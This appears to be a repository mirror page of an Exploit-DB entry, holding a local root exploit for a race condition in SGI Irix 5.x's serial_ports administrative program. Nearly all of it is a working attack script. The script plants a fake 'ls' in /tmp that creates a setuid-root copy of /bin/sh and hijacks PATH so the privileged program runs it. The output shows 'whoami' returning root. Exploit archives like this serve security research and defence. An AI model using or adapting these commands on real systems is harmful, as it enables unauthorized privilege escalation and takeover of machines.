bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/irix/local/19351.sh
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
499 B
Bash
Executable file
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/464/info
A race condition exists in the serial_ports administrative program, as included by SGI in the 5.x Irix operating system. This race condition allows regular users to execute arbitrary commands as root.
cat > /tmp/ls
#!/bin/sh
cp /bin/sh /tmp/foo
chmod 4777 /tmp/foo
^D
chmod 755 /tmp/ls
cd /tmp
set PATH=( . $PATH )
/usr/lib/vadmin/serial_ports
# wait about 10-20 seconds and hit ^C, or wait for it to
# die out completely
/tmp/foo
# whoami
root
Reference in a new issue View git blame Copy permalink